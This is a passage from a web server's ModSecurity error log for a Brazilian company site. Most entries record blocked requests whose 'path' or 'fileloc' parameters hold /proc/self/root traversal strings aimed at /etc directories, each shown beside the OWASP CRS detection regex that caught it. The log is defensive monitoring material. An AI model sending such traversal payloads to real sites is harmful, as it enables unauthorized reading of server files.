"abpzYda6ubjKNq_cu4ZrBAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:55.037766 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:48222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzY_u8EFLIOrSqIpvaHAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:56.267307 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:48232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzZOw_le52K8_3pV21QwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:41:57.654752 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:48236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzZdY0UrI5A3LftIxtqQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:11.947855 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:48250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzc9a6ubjKNq_cu4ZrEQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:21.975033 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:34472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzfQkwaGbbGflqUZDllgAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:37.206892 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.228.61:44534] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpzjUzinOy1jxa1j4fnvQAAAQE"]
[Wed Mar 18 06:42:38.623605 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.244.43:44328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpzjkzinOy1jxa1j4fnvwAAAQc"]
[Wed Mar 18 06:42:42.387254 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:56874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzkimAPhZkrhU8w4lC1wAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:43.680483 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:38016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzk_u8EFLIOrSqIpvaJwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:44.970463 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:38030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzlOoXxyEfFpUF8f9BwQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:46.264884 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:38044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzltY0UrI5A3LftIxtzQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:49.859539 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:38018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzmdY0UrI5A3LftIxt0wAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:54.046196 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:38048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzngkwaGbbGflqUZDloQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:55.351094 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:50916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpznymAPhZkrhU8w4lC2AAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:56.709184 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:50922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzoCmAPhZkrhU8w4lC2gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:42:59.065042 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:50938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzo9a6ubjKNq_cu4ZrHgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:00.383355 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:44704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzpPu8EFLIOrSqIpvaKwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:02.743566 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:44720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzpuoXxyEfFpUF8f9BxgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:04.050370 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:44724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzqEzinOy1jxa1j4fnygAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:06.462138 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:44732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzqtY0UrI5A3LftIxt5gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:07.786885 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:44738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzq-yqAr6etmhZHNqQagAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:09.103853 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:44754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzrdY0UrI5A3LftIxt6QAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:10.429443 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:41176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzrvu8EFLIOrSqIpvaLwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:43:12.632861 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:41944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpzsNY0UrI5A3LftIxt7wAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
